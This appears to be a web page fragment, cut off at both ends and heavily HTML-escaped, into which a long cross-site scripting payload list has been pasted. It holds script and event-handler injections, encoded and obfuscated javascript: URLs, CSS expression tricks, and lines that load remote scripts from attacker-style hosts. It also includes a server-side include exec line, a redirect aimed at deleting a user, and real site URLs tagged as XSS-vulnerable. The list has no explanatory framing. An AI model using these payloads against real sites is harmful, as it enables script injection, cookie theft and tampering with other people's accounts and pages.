SRC=&amp;#x6A&amp;#x61&amp;#x76&amp;#x61&amp;#x73&amp;#x63&amp;#x72&amp;#x69&amp;#x70&amp;#x74&amp;#x3A&amp;#x61&amp;#x6C&amp;#x65&amp;#x72&amp;#x74&amp;#x28&amp;#x27&amp;#x58&amp;#x53&amp;#x53&amp;#x27&amp;#x29&gt;\\r\\n&lt;BODY BACKGROUND=\\\&quot;javascript:alert(\\\&#039;XSS\\\&#039;)\\\&quot;&gt;\\r\\n&lt;BODY ONLOAD=alert(\\\&#039;XSS\\\&#039;)&gt;\\r\\n&lt;INPUT TYPE=\\\&quot;IMAGE\\\&quot; SRC=\\\&quot;javascript:alert(\\\&#039;XSS\\\&#039;);\\\&quot;&gt;\\r\\n&lt;IMG SRC=\\\&quot;javascript:alert(\\\&#039;XSS\\\&#039;)\\\&quot;\\r\\n&lt;iframe src=http://ha.ckers.org/scriptlet.html &lt;\\r\\n&lt;&lt;SCRIPT&gt;alert(\\\&quot;XSS\\\&quot;);//&lt;&lt;/SCRIPT&gt;\\r\\n%253cscript%253ealert(1)%253c/script%253e\\r\\n\\\&quot;&gt;&lt;s\\\&quot;%2b\\\&quot;cript&gt;alert(document.cookie)&lt;/script&gt;\\r\\nfoo&lt;script&gt;alert(1)&lt;/script&gt;\\r\\n&lt;scr&lt;script&gt;ipt&gt;alert(1)&lt;/scr&lt;/script&gt;ipt&gt;\\r\\n&lt;SCRIPT&gt;String.fromCharCode(97, 108, 101, 114, 116, 40, 49, 41)&lt;/SCRIPT&gt;\\r\\n\\\&#039;;alert(String.fromCharCode(88,83,83))//\\\\\\\&#039;;alert(String.fromCharCode(88,83,83))//\\\&quot;;alert(String.fromCharCode(88,83,83))//\\\\\\\&quot;;alert(String.fromCharCode(88,83,83))//--&gt;&lt;/SCRIPT&gt;\\\&quot;&gt;\\\&#039;&gt;&lt;SCRIPT&gt;alert(String.fromCharCode(88,83,83))&lt;/SCRIPT&gt;\\r\\n&lt;marquee onstart=\\\&#039;javascript:alert(\\\&#039;1\\\&#039;);\\\&#039;&gt;=(◕_◕)=</code> <p>keyword(s): 11</p> <p>description: &lt;body =\\\&quot;while(true) alert&#40;\\\&#039;XSS\\\&#039;&#41;;\\\&quot;&gt;\\r\\n\\\&#039;\\\&quot;&gt;&lt;/title&gt;alert&#40;1111&#41;\\r\\n&lt;/textarea&gt;\\\&#039;\\\&quot;&gt;alert&#40;&#41;\\r\\n\\\&#039;\\\&quot;\\\&quot;&gt;&lt;script language=\\\&quot;JavaScript\\\&quot;&gt; alert&#40;\\\&#039;X \\\\nS \\\\nS\\\&#039;&#41;;\\r\\n&lt;&lt;&lt;&lt;&gt;&gt;&gt;&gt;&lt;&lt;alert&#40;123&#41;\\r\\n&lt;html&gt;&lt;noalert&gt;&lt;noscript&gt;(123)&lt;/noscript&gt;(123)\\r\\n&lt;INPUT TYPE=\\\&quot;IMAGE\\\&quot; SRC=\\\&quot;(\\\&#039;XSS\\\&#039;);\\\&quot;&gt;\\r\\n\\\&#039;&gt;&lt;/select&gt;alert&#40;123&#41;\\r\\n\\\&#039;&gt;\\\&quot;&gt;&lt;script src = \\\&#039;http://www.site.com/XSS.js\\\&#039;&gt;\\r\\n}&lt;/style&gt;a=eval;b=alert;a(b(/XSS/.source));\\r\\n(\\\&quot;XSS\\\&quot;);\\r\\na=\\\&quot;get\\\&quot;;b=\\\&quot;URL\\\&quot;;c=\\\&quot;\\\&quot;;d=\\\&quot;alert&#40;\\\&#039;xss\\\&#039;&#41;;\\\&quot;;eval&#40;a+b+c+d&#41;;\\r\\n=\\\&#039;&gt;alert&#40;\\\&quot;xss\\\&quot;&#41;\\r\\n&lt;script+src=\\\&quot;&gt;\\\&quot;+src=\\\&quot;http://yoursite.com/xss.js?69,69\\\&quot;&gt;\\r\\n&lt;body background=\\\&#039;\\\&quot;&gt;alert&#40;navigator.userAgent&#41;&gt;&lt;/body&gt;\\r\\n\\\&quot;&gt;/XaDoS/&gt;alert&#40;&#41;&lt;script src=\\\&quot;http://www.site.com/XSS.js\\\&quot;&gt;\\r\\n\\\&quot;&gt;/KinG-InFeT.NeT/&gt;alert&#40;&#41;\\r\\nsrc=\\\&quot;http://www.site.com/XSS.js\\\&quot;&gt;\\r\\nIj48L3RpdGxlPjxzY3JpcHQ+YWxlcnQoMTMzNyk8L3NjcmlwdD4=\\r\\n!--\\\&quot; /&gt;alert&#40;\\\&#039;xss\\\&#039;&#41;;\\r\\nalert&#40;\\\&quot;XSS by \\\\nxss\\\&quot;&#41;&lt;marquee&gt;&lt;h1&gt;XSS by xss&lt;/h1&gt;&lt;/marquee&gt;\\r\\n\\\&quot;&gt;alert&#40;\\\&quot;XSS by \\\\nxss\\\&quot;&#41;&gt;&lt;marquee&gt;&lt;h1&gt;XSS by xss&lt;/h1&gt;&lt;/marquee&gt;\\r\\n\\\&#039;\\\&quot;&gt;&lt;/title&gt;alert&#40;\\\&quot;XSS by \\\\nxss\\\&quot;&#41;&gt;&lt;marquee&gt;&lt;h1&gt;XSS by xss&lt;/h1&gt;&lt;/marquee&gt;\\r\\n&lt;img \\\&quot;\\\&quot;\\\&quot;&gt;alert&#40;\\\&quot;XSS by \\\\nxss\\\&quot;&#41;&lt;marquee&gt;&lt;h1&gt;XSS by xss&lt;/h1&gt;&lt;/marquee&gt;\\r\\nalert&#40;1337&#41;&lt;marquee&gt;&lt;h1&gt;XSS by xss&lt;/h1&gt;&lt;/marquee&gt;\\r\\n\\\&quot;&gt;alert&#40;1337&#41;\\\&quot;&gt;alert&#40;\\\&quot;XSS by \\\\nxss&lt;/h1&gt;&lt;/marquee&gt;\\r\\n\\\&#039;\\\&quot;&gt;&lt;/title&gt;alert&#40;1337&#41;&gt;&lt;marquee&gt;&lt;h1&gt;XSS by xss&lt;/h1&gt;&lt;/marquee&gt;\\r\\n&lt;iframe src=\\\&quot;(\\\&#039;XSS by \\\\nxss\\\&#039;&#41;;\\\&quot;&gt;&lt;/iframe&gt;&lt;marquee&gt;&lt;h1&gt;XSS by xss&lt;/h1&gt;&lt;/marquee&gt;\\r\\n\\\&#039;&gt;alert&#40;String.fromCharCode(88,83,83&#41;)&lt;img src=\\\&quot;\\\&quot; alt=\\\&#039;\\r\\n\\\&quot;&gt;alert&#40;String.fromCharCode(88,83,83&#41;)&lt;img src=\\\&quot;\\\&quot; alt=\\\&quot;\\r\\n\\\\\\\&#039;&gt;alert&#40;String.fromCharCode(88,83,83&#41;)&lt;img src=\\\&quot;\\\&quot; alt=\\\\\\\&#039;\\r\\nhttp://www.simpatie.ro/index.php?page=friends&amp;member=781339&amp;javafunctionname=Pageclick&amp;javapgno=2 javapgno=2 ??XSS??\\r\\nhttp://www.simpatie.ro/index.php?page=top_movies&amp;cat=13&amp;p=2 p=2 ??XSS??\\r\\n\\\&#039;); alert&#40;\\\&#039;xss\\\&#039;&#41;; var x=\\\&#039;\\r\\n\\\\\\\\\\\&#039;); alert&#40;\\\\\\\&#039;xss\\\\\\\&#039;&#41;;var x=\\\\\\\&#039;\\r\\n//--&gt;alert&#40;String.fromCharCode(88,83,83&#41;);\\r\\n&gt;\\\&quot;&gt;&lt;ScRiPt%20%0a%0d&gt;alert&#40;561177485777&#41;%3B\\r\\n&lt;img src=\\\&quot;Mario Heiderich says that svg SHOULD not be executed trough image tags\\\&quot; =\\\&quot;(\\\&#039;\\\\u003c\\\\u0069\\\\u0066\\\\u0072\\\\u0061\\\\u006d\\\\u0065\\\\u0020\\\\u0073\\\\u0072\\\\u0063\\\\u003d\\\\u0022\\\\u0064\\\\u0061\\\\u0074\\\\u0061\\\\u003a\\\\u0069\\\\u006d\\\\u0061\\\\u0067\\\\u0065\\\\u002f\\\\u0073\\\\u0076\\\\u0067\\\\u002b\\\\u0078\\\\u006d\\\\u006c\\\\u003b\\\\u0062\\\\u0061\\\\u0073\\\\u0065\\\\u0036\\\\u0034\\\\u002c\\\\u0050\\\\u0048\\\\u004e\\\\u0032\\\\u005a\\\\u0079\\\\u0042\\\\u0034\\\\u0062\\\\u0057\\\\u0078\\\\u0075\\\\u0063\\\\u007a\\\\u0030\\\\u0069\\\\u0061\\\\u0048\\\\u0052\\\\u0030\\\\u0063\\\\u0044\\\\u006f\\\\u0076\\\\u004c\\\\u0033\\\\u0064\\\\u0033\\\\u0064\\\\u0079\\\\u0035\\\\u0033\\\\u004d\\\\u0079\\\\u0035\\\\u0076\\\\u0063\\\\u006d\\\\u0063\\\\u0076\\\\u004d\\\\u006a\\\\u0041\\\\u0077\\\\u004d\\\\u0043\\\\u0039\\\\u007a\\\\u0064\\\\u006d\\\\u0063\\\\u0069\\\\u0050\\\\u0069\\\\u0041\\\\u0067\\\\u0043\\\\u0069\\\\u0041\\\\u0067\\\\u0049\\\\u0044\\\\u0078\\\\u0070\\\\u0062\\\\u0057\\\\u0046\\\\u006e\\\\u005a\\\\u0053\\\\u0042\\\\u0076\\\\u0062\\\\u006d\\\\u0078\\\\u0076\\\\u0059\\\\u0057\\\\u0051\\\\u0039\\\\u0049\\\\u006d\\\\u0046\\\\u0073\\\\u005a\\\\u0058\\\\u004a\\\\u0030\\\\u004b\\\\u0044\\\\u0045\\\\u0070\\\\u0049\\\\u006a\\\\u0034\\\\u0038\\\\u004c\\\\u0032\\\\u006c\\\\u0074\\\\u0059\\\\u0057\\\\u0064\\\\u006c\\\\u0050\\\\u0069\\\\u0041\\\\u0067\\\\u0043\\\\u0069\\\\u0041\\\\u0067\\\\u0049\\\\u0044\\\\u0078\\\\u007a\\\\u0064\\\\u006d\\\\u0063\\\\u0067\\\\u0062\\\\u0032\\\\u0035\\\\u0073\\\\u0062\\\\u0032\\\\u0046\\\\u006b\\\\u0050\\\\u0053\\\\u004a\\\\u0068\\\\u0062\\\\u0047\\\\u0056\\\\u0079\\\\u0064\\\\u0043\\\\u0067\\\\u0079\\\\u004b\\\\u0053\\\\u0049\\\\u002b\\\\u0050\\\\u0043\\\\u0039\\\\u007a\\\\u0064\\\\u006d\\\\u0063\\\\u002b\\\\u0049\\\\u0043\\\\u0041\\\\u004b\\\\u0049\\\\u0043\\\\u0041\\\\u0067\\\\u0050\\\\u0048\\\\u004e\\\\u006a\\\\u0063\\\\u006d\\\\u006c\\\\u0077\\\\u0064\\\\u0044\\\\u0035\\\\u0068\\\\u0062\\\\u0047\\\\u0056\\\\u0079\\\\u0064\\\\u0043\\\\u0067\\\\u007a\\\\u004b\\\\u0054\\\\u0077\\\\u0076\\\\u0063\\\\u0032\\\\u004e\\\\u0079\\\\u0061\\\\u0058\\\\u0042\\\\u0030\\\\u0050\\\\u0069\\\\u0041\\\\u0067\\\\u0043\\\\u0069\\\\u0041\\\\u0067\\\\u0049\\\\u0044\\\\u0078\\\\u006b\\\\u005a\\\\u0057\\\\u005a\\\\u007a\\\\u0049\\\\u0047\\\\u0039\\\\u0075\\\\u0062\\\\u0047\\\\u0039\\\\u0068\\\\u005a\\\\u0044\\\\u0030\\\\u0069\\\\u0059\\\\u0057\\\\u0078\\\\u006c\\\\u0063\\\\u006e\\\\u0051\\\\u006f\\\\u004e\\\\u0043\\\\u006b\\\\u0069\\\\u0050\\\\u006a\\\\u0077\\\\u0076\\\\u005a\\\\u0047\\\\u0056\\\\u006d\\\\u0063\\\\u007a\\\\u0034\\\\u0067\\\\u0049\\\\u0041\\\\u006f\\\\u0067\\\\u0049\\\\u0043\\\\u0041\\\\u0038\\\\u005a\\\\u0079\\\\u0042\\\\u0076\\\\u0062\\\\u006d\\\\u0078\\\\u0076\\\\u0059\\\\u0057\\\\u0051\\\\u0039\\\\u0049\\\\u006d\\\\u0046\\\\u0073\\\\u005a\\\\u0058\\\\u004a\\\\u0030\\\\u004b\\\\u0044\\\\u0055\\\\u0070\\\\u0049\\\\u006a\\\\u0034\\\\u0067\\\\u0049\\\\u0041\\\\u006f\\\\u0067\\\\u0049\\\\u0043\\\\u0041\\\\u0067\\\\u0049\\\\u0043\\\\u0041\\\\u0067\\\\u0050\\\\u0047\\\\u004e\\\\u0070\\\\u0063\\\\u006d\\\\u004e\\\\u0073\\\\u005a\\\\u0053\\\\u0042\\\\u0076\\\\u0062\\\\u006d\\\\u0078\\\\u0076\\\\u0059\\\\u0057\\\\u0051\\\\u0039\\\\u0049\\\\u006d\\\\u0046\\\\u0073\\\\u005a\\\\u0058\\\\u004a\\\\u0030\\\\u004b\\\\u0044\\\\u0059\\\\u0070\\\\u0049\\\\u0069\\\\u0041\\\\u0076\\\\u0050\\\\u0069\\\\u0041\\\\u0067\\\\u0043\\\\u0069\\\\u0041\\\\u0067\\\\u0049\\\\u0043\\\\u0041\\\\u0067\\\\u0049\\\\u0043\\\\u0041\\\\u0038\\\\u0064\\\\u0047\\\\u0056\\\\u0034\\\\u0064\\\\u0043\\\\u0042\\\\u0076\\\\u0062\\\\u006d\\\\u0078\\\\u0076\\\\u0059\\\\u0057\\\\u0051\\\\u0039\\\\u0049\\\\u006d\\\\u0046\\\\u0073\\\\u005a\\\\u0058\\\\u004a\\\\u0030\\\\u004b\\\\u0044\\\\u0063\\\\u0070\\\\u0049\\\\u006a\\\\u0034\\\\u0038\\\\u004c\\\\u0033\\\\u0052\\\\u006c\\\\u0065\\\\u0048\\\\u0051\\\\u002b\\\\u0049\\\\u0043\\\\u0041\\\\u004b\\\\u0049\\\\u0043\\\\u0041\\\\u0067\\\\u0050\\\\u0043\\\\u0039\\\\u006e\\\\u0050\\\\u0069\\\\u0041\\\\u0067\\\\u0043\\\\u006a\\\\u0077\\\\u0076\\\\u0063\\\\u0033\\\\u005a\\\\u006e\\\\u0050\\\\u0069\\\\u0041\\\\u0067\\\\u0022\\\\u003e\\\\u003c\\\\u002f\\\\u0069\\\\u0066\\\\u0072\\\\u0061\\\\u006d\\\\u0065\\\\u003e\\\&#039;);\\\&quot;&gt;&lt;/img&gt;\\r\\n&lt;/body&gt;\\r\\n&lt;/html&gt;\\r\\n&lt;SCRIPT SRC=http://hacker-site.com/xss.js&gt;\\r\\n alert&#40;“XSS”&#41;; \\r\\n&lt;BODY =alert&#40;\\\&quot;XSS\\\&quot;&#41;&gt;\\r\\n&lt;BODY BACKGROUND=\\\&quot;(\\\&#039;XSS\\\&#039;)\\\&quot;&gt;\\r\\n&lt;IMG SRC=\\\&quot;(\\\&#039;XSS\\\&#039;);\\\&quot;&gt;\\r\\n&lt;IMG DYNSRC=\\\&quot;(\\\&#039;XSS\\\&#039;)\\\&quot;&gt;\\r\\n&lt;IMG LOWSRC=\\\&quot;(\\\&#039;XSS\\\&#039;)\\\&quot;&gt;\\r\\n&lt;IFRAME SRC=”http://hacker-site.com/xss.html”&gt;\\r\\n&lt;INPUT TYPE=\\\&quot;IMAGE\\\&quot; SRC=\\\&quot;(\\\&#039;XSS\\\&#039;);\\\&quot;&gt;\\r\\n&lt;LINK REL=\\\&quot;stylesheet\\\&quot; HREF=\\\&quot;(\\\&#039;XSS\\\&#039;);\\\&quot;&gt;\\r\\n&lt;TABLE BACKGROUND=\\\&quot;(\\\&#039;XSS\\\&#039;)\\\&quot;&gt;\\r\\n&lt;TD BACKGROUND=\\\&quot;(\\\&#039;XSS\\\&#039;)\\\&quot;&gt;\\r\\n&lt;DIV STYLE=\\\&quot;background-image: url((\\\&#039;XSS\\\&#039;))\\\&quot;&gt;\\r\\n&lt;DIV STYLE=\\\&quot;width: alert&#40;\\\&#039;XSS\\\&#039;&#41;);\\\&quot;&gt;\\r\\n&lt;OBJECT TYPE=\\\&quot;text/x-scriptlet\\\&quot; DATA=\\\&quot;http://hacker.com/xss.html\\\&quot;&gt;\\r\\n&lt;EMBED SRC=\\\&quot;http://hacker.com/xss.swf\\\&quot; AllowScriptAccess=\\\&quot;always\\\&quot;&gt;\\r\\n&amp;apos;;alert&#40;String.fromCharCode(88,83,83&#41;)//\\\\&amp;apos;;alert&#40;String.fromCharCode(88,83,83&#41;)//&amp;quot;;alert&#40;String.fromCharCode(88,83,83&#41;)//\\\\&amp;quot;;alert&#40;String.fromCharCode(88,83,83&#41;)//--&amp;gt;&amp;lt;/SCRIPT&amp;gt;&amp;quot;&amp;gt;&amp;apos;&amp;gt;&amp;lt;SCRIPT&amp;gt;alert&#40;String.fromCharCode(88,83,83&#41;)&amp;lt;/SCRIPT&amp;gt;\\r\\n&amp;apos;&amp;apos;;!--&amp;quot;&amp;lt;XSS&amp;gt;=&amp;amp;{()}\\r\\n&amp;lt;SCRIPT&amp;gt;alert&#40;&amp;apos;XSS&amp;apos;&#41;&amp;lt;/SCRIPT&amp;gt;\\r\\n&amp;lt;SCRIPT SRC=http://ha.ckers.org/xss.js&amp;gt;&amp;lt;/SCRIPT&amp;gt;\\r\\n&amp;lt;SCRIPT&amp;gt;alert&#40;String.fromCharCode(88,83,83&#41;)&amp;lt;/SCRIPT&amp;gt;\\r\\n&amp;lt;BASE HREF=&amp;quot;(&amp;apos;XSS&amp;apos;);//&amp;quot;&amp;gt;\\r\\n&amp;lt;BGSOUND SRC=&amp;quot;(&amp;apos;XSS&amp;apos;);&amp;quot;&amp;gt;\\r\\n&amp;lt;BODY BACKGROUND=&amp;quot;(&amp;apos;XSS&amp;apos;);&amp;quot;&amp;gt;\\r\\n&amp;lt;BODY =alert&#40;&amp;apos;XSS&amp;apos;&#41;&amp;gt;\\r\\n&amp;lt;DIV STYLE=&amp;quot;background-image: url((&amp;apos;XSS&amp;apos;))&amp;quot;&amp;gt;\\r\\n&amp;lt;DIV STYLE=&amp;quot;background-image: url(&amp;amp;#1;(&amp;apos;XSS&amp;apos;))&amp;quot;&amp;gt;\\r\\n&amp;lt;DIV STYLE=&amp;quot;width: alert&#40;&amp;apos;XSS&amp;apos;&#41;);&amp;quot;&amp;gt;\\r\\n&amp;lt;FRAMESET&amp;gt;&amp;lt;FRAME SRC=&amp;quot;(&amp;apos;XSS&amp;apos;);&amp;quot;&amp;gt;&amp;lt;/FRAMESET&amp;gt;\\r\\n&amp;lt;IFRAME SRC=&amp;quot;(&amp;apos;XSS&amp;apos;);&amp;quot;&amp;gt;&amp;lt;/IFRAME&amp;gt;\\r\\n&amp;lt;INPUT TYPE=&amp;quot;IMAGE&amp;quot; SRC=&amp;quot;(&amp;apos;XSS&amp;apos;);&amp;quot;&amp;gt;\\r\\n&amp;lt;IMG SRC=&amp;quot;(&amp;apos;XSS&amp;apos;);&amp;quot;&amp;gt;\\r\\n&amp;lt;IMG SRC=(&amp;apos;XSS&amp;apos;)&amp;gt;\\r\\n&amp;lt;IMG DYNSRC=&amp;quot;(&amp;apos;XSS&amp;apos;);&amp;quot;&amp;gt;\\r\\n&amp;lt;IMG LOWSRC=&amp;quot;(&amp;apos;XSS&amp;apos;);&amp;quot;&amp;gt;\\r\\n&amp;lt;IMG SRC=&amp;quot;http://www.thesiteyouareon.com/somecommand.php?somevariables=maliciouscode&amp;quot;&amp;gt;\\r\\nRedirect 302 /a.jpg http://victimsite.com/admin.asp&amp;amp;deleteuser\\r\\nexp/*&amp;lt;XSS STYLE=&amp;apos;no\\\\xss:noxss(&amp;quot;*//*&amp;quot;);\\r\\n&amp;lt;STYLE&amp;gt;li {list-style-image: url(&amp;quot;(&amp;#39;XSS&amp;#39;)&amp;quot;);}&amp;lt;/STYLE&amp;gt;&amp;lt;UL&amp;gt;&amp;lt;LI&amp;gt;XSS\\r\\n&amp;lt;IMG SRC=&amp;apos;(&amp;quot;XSS&amp;quot;)&amp;apos;&amp;gt;\\r\\n&amp;lt;LAYER SRC=&amp;quot;http://ha.ckers.org/scriptlet.html&amp;quot;&amp;gt;&amp;lt;/LAYER&amp;gt;\\r\\n&amp;lt;IMG SRC=&amp;quot;;quot;&amp;gt;\\r\\n%BCscript%BEalert&#40;%A2XSS%A2&#41;%BC/script%BE\\r\\n&amp;lt;META HTTP-EQUIV=&amp;quot;refresh&amp;quot; CONTENT=&amp;quot;0;url=(&amp;apos;XSS&amp;apos;);&amp;quot;&amp;gt;\\r\\n&amp;lt;META HTTP-EQUIV=&amp;quot;refresh&amp;quot; CONTENT=&amp;quot;0;url=PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K&amp;quot;&amp;gt;\\r\\n&amp;lt;META HTTP-EQUIV=&amp;quot;refresh&amp;quot; CONTENT=&amp;quot;0; URL=http://;URL=(&amp;apos;XSS&amp;apos;);&amp;quot;&amp;gt;\\r\\n&amp;lt;IMG SRC=&amp;quot;;quot;&amp;gt;\\r\\n&amp;lt;OBJECT TYPE=&amp;quot;text/x-scriptlet&amp;quot; DATA=&amp;quot;http://ha.ckers.org/scriptlet.html&amp;quot;&amp;gt;&amp;lt;/OBJECT&amp;gt;\\r\\n&amp;lt;OBJECT classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389&amp;gt;&amp;lt;param name=url value=(&amp;apos;XSS&amp;apos;)&amp;gt;&amp;lt;/OBJECT&amp;gt;\\r\\n&amp;lt;EMBED SRC=&amp;quot;http://ha.ckers.org/xss.swf&amp;quot; AllowScriptAccess=&amp;quot;always&amp;quot;&amp;gt;&amp;lt;/EMBED&amp;gt;\\r\\na=&amp;quot;get&amp;quot;;&amp;amp;#10;b=&amp;quot;URL(&amp;quot;&amp;quot;;&amp;amp;#10;c=&amp;quot;;quot;;&amp;amp;#10;d=&amp;quot;alert&#40;&amp;apos;XSS&amp;apos;&#41;;&amp;quot;)&amp;quot;;&amp;#10;eval&#40;a+b+c+d&#41;;\\r\\n&amp;lt;STYLE TYPE=&amp;quot;text/javascript&amp;quot;&amp;gt;alert&#40;&amp;apos;XSS&amp;apos;&#41;;&amp;lt;/STYLE&amp;gt;\\r\\n&amp;lt;IMG STYLE=&amp;quot;xss:expr/*XSS*/ession(alert&#40;&amp;apos;XSS&amp;apos;&#41;)&amp;quot;&amp;gt;\\r\\n&amp;lt;XSS STYLE=&amp;quot;xss:alert&#40;&amp;apos;XSS&amp;apos;&#41;)&amp;quot;&amp;gt;\\r\\n&amp;lt;STYLE&amp;gt;.XSS{background-image:url(&amp;quot;(&amp;apos;XSS&amp;apos;)&amp;quot;);}&amp;lt;/STYLE&amp;gt;&amp;lt;A CLASS=XSS&amp;gt;&amp;lt;/A&amp;gt;\\r\\n&amp;lt;STYLE type=&amp;quot;text/css&amp;quot;&amp;gt;BODY{background:url(&amp;quot;(&amp;apos;XSS&amp;apos;)&amp;quot;)}&amp;lt;/STYLE&amp;gt;\\r\\n&amp;lt;LINK REL=&amp;quot;stylesheet&amp;quot; HREF=&amp;quot;(&amp;apos;XSS&amp;apos;);&amp;quot;&amp;gt;\\r\\n&amp;lt;LINK REL=&amp;quot;stylesheet&amp;quot; HREF=&amp;quot;http://ha.ckers.org/xss.css&amp;quot;&amp;gt;\\r\\n&amp;lt;STYLE&amp;gt;@import&amp;apos;http://ha.ckers.org/xss.css&amp;apos;;&amp;lt;/STYLE&amp;gt;\\r\\n&amp;lt;META HTTP-EQUIV=&amp;quot;Link&amp;quot; Content=&amp;quot;&amp;lt;http://ha.ckers.org/xss.css&amp;gt;; REL=stylesheet&amp;quot;&amp;gt;\\r\\n&amp;lt;STYLE&amp;gt;BODY{:url(&amp;quot;http://ha.ckers.org/xssmoz.xml#xss&amp;quot;)}&amp;lt;/STYLE&amp;gt;\\r\\n&amp;lt;TABLE BACKGROUND=&amp;quot;(&amp;apos;XSS&amp;apos;)&amp;quot;&amp;gt;&amp;lt;/TABLE&amp;gt;\\r\\n&amp;lt;TABLE&amp;gt;&amp;lt;TD BACKGROUND=&amp;quot;(&amp;apos;XSS&amp;apos;)&amp;quot;&amp;gt;&amp;lt;/TD&amp;gt;&amp;lt;/TABLE&amp;gt;\\r\\n&amp;lt;HTML xmlns:xss&amp;gt;\\r\\n&amp;lt;XML ID=I&amp;gt;&amp;lt;X&amp;gt;&amp;lt;C&amp;gt;&amp;lt;![CDATA[&amp;lt;IMG SRC=&amp;quot;javas]]&amp;gt;&amp;lt;![CDATA[cript:alert&#40;&amp;apos;XSS&amp;apos;&#41;;&amp;quot;&amp;gt;]]&amp;gt;\\r\\n&amp;lt;XML ID=&amp;quot;xss&amp;quot;&amp;gt;&amp;lt;I&amp;gt;&amp;lt;B&amp;gt;&amp;lt;IMG SRC=&amp;quot;javas&amp;lt;!-- --&amp;gt;cript:alert&#40;&amp;apos;XSS&amp;apos;&#41;&amp;quot;&amp;gt;&amp;lt;/B&amp;gt;&amp;lt;/I&amp;gt;&amp;lt;/XML&amp;gt;\\r\\n&amp;lt;XML SRC=&amp;quot;http://ha.ckers.org/xsstest.xml&amp;quot; ID=I&amp;gt;&amp;lt;/XML&amp;gt;\\r\\n&amp;lt;HTML&amp;gt;&amp;lt;BODY&amp;gt;\\r\\n&amp;lt;!--[if gte IE 4]&amp;gt; \\r\\n&amp;lt;META HTTP-EQUIV=&amp;quot;Set-Cookie&amp;quot; Content=&amp;quot;USERID=&amp;lt;SCRIPT&amp;gt;alert&#40;&amp;apos;XSS&amp;apos;&#41;&amp;lt;/SCRIPT&amp;gt;&amp;quot;&amp;gt;\\r\\n&amp;lt;XSS STYLE=&amp;quot;(http://ha.ckers.org/xss.htc);&amp;quot;&amp;gt;\\r\\n&amp;lt;SCRIPT SRC=&amp;quot;http://ha.ckers.org/xss.jpg&amp;quot;&amp;gt;&amp;lt;/SCRIPT&amp;gt;\\r\\n&amp;lt;!--#exec cmd=&amp;quot;/bin/echo &amp;apos;&amp;lt;SCRIPT SRC&amp;apos;&amp;quot;--&amp;gt;&amp;lt;!--#exec cmd=&amp;quot;/bin/echo &amp;apos;=http://ha.ckers.org/xss.js&amp;gt;&amp;lt;/SCRIPT&amp;gt;&amp;apos;&amp;quot;--&amp;gt;\\r\\n&amp;lt;? echo(&amp;apos;&amp;lt;SCR)&amp;apos;;\\r\\n&amp;lt;BR SIZE=&amp;quot;&amp;amp;{alert&#40;&amp;apos;XSS&amp;apos;&#41;}&amp;quot;&amp;gt;\\r\\n&amp;lt;IMG SRC=(&amp;apos;XSS&amp;apos;)&amp;gt;\\r\\n&amp;lt;IMG SRC=(&amp;amp;quot;XSS&amp;amp;quot;)&amp;gt;\\r\\n&amp;lt;IMG SRC=`(&amp;quot;RSnake says, &amp;apos;XSS&amp;apos;&amp;quot;)`&amp;gt;\\r\\n&amp;lt;IMG SRC=(String.fromCharCode(88,83,83))&amp;gt;\\r\\n&amp;lt;IMG SRC=&amp;amp;#106;&amp;amp;#97;&amp;amp;#118;&amp;amp;#97;&amp;amp;#115;&amp;amp;#99;&amp;amp;#114;&amp;amp;#105;&amp;amp;#112;&amp;amp;#116;&amp;amp;#58;&amp;amp;#97;&amp;amp;#108;&amp;amp;#101;&amp;amp;#114;&amp;amp;#116;&amp;amp;#40;&amp;amp;#39;&amp;amp;#88;&amp;amp;#83;&amp;amp;#83;&amp;amp;#39;&amp;amp;#41;&amp;gt;\\r\\n&amp;lt;IMG SRC=&amp;amp;#0000106&amp;amp;#0000097&amp;amp;#0000118&amp;amp;#0000097&amp;amp;#0000115&amp;amp;#0000099&amp;amp;#0000114&amp;amp;#0000105&amp;amp;#0000112&amp;amp;#0000116&amp;amp;#0000058&amp;amp;#0000097&amp;amp;#0000108&amp;amp;#0000101&amp;amp;#0000114&amp;amp;#0000116&amp;amp;#0000040&amp;amp;#0000039&amp;amp;#0000088&amp;amp;#0000083&amp;amp;#0000083&amp;amp;#0000039&amp;amp;#0000041&amp;gt;\\r\\n&amp;lt;DIV STYLE=&amp;quot;background-image:\\\\0075\\\\0072\\\\006C\\\\0028&amp;apos;\\\\006a\\\\0061\\\\0076\\\\0061\\\\0073\\\\0063\\\\0072\\\\0069\\\\0070\\\\0074\\\\003a\\\\0061\\\\006c\\\\0065\\\\0072\\\\0074\\\\0028.1027\\\\0058.1053\\\\0053\\\\0027\\\\0029&amp;apos;\\\\0029&amp;quot;&amp;gt;\\r\\n&amp;lt;IMG SRC=&amp;amp;#x6A&amp;amp;#x61&amp;amp;#x76&amp;amp;#x61&amp;amp;#x73&amp;amp;#x63&amp;amp;#x72&amp;amp;#x69&amp;amp;#x70&amp;amp;#x74&amp;amp;#x3A&amp;amp;#x61&amp;amp;#x6C&amp;amp;#x65&amp;amp;#x72&amp;amp;#x74&amp;amp;#x28&amp;amp;#x27&amp;amp;#x58&amp;amp;#x53&amp;amp;#x53&amp;amp;#x27&amp;amp;#x29&amp;gt;\\r\\n&amp;lt;HEAD&amp;gt;&amp;lt;META HTTP-EQUIV=&amp;quot;CONTENT-TYPE&amp;quot; CONTENT=&amp;quot;text/html; charset=UTF-7&amp;quot;&amp;gt; &amp;lt;/HEAD&amp;gt;\\r\\n\\\\";alert&#40;'XSS'&#41;;//\\r\\n&lt;/TITLE&gt;\\r\\n&lt;STYLE&gt;@im\\\\port'\\\\ja\\\\vasc\\\\ript:alert&#40;"XSS"&#41;';&lt;/STYLE&gt;\\r\\n<IMG >\\ HREF="http://66.102.7.147/">XSS</A>\\r\\n<A HREF="http://www.google.com">XSS</A>\\r\\n<A HREF="http://1113982867/">XSS</A>\\r\\n<A HREF="http://0x42.0x0000066.0x7.0x93/">XSS</A>\\r\\n<A HREF="http://0102.0146.0007.00000223/">XSS</A>\\r\\n<A HREF="h tt p://6 6.000146.0x7.147/">XSS</A>\\r\\n<A HREF="//www.google.com/">XSS</A>\\r\\n<A HREF="//google">XSS</A>\\r\\n<A HREF="http://ha.ckers.org@google">XSS</A>\\r\\n<A HREF="http://google:ha.ckers.org">XSS</A>\\r\\n<A HREF="http://google.com/">XSS</A>\\r\\n<A HREF="http://www.google.com./">XSS</A>\\r\\n<A href="">XSS</A>\\r\\n<A HREF="http://www.gohttp://www.google.com/ogle.com/">XSS</A>\\r\\ndocument.vulnerable=true;\\r\\n&lt;img SRC=\\\";\\\"&gt;\\r\\n&lt;img 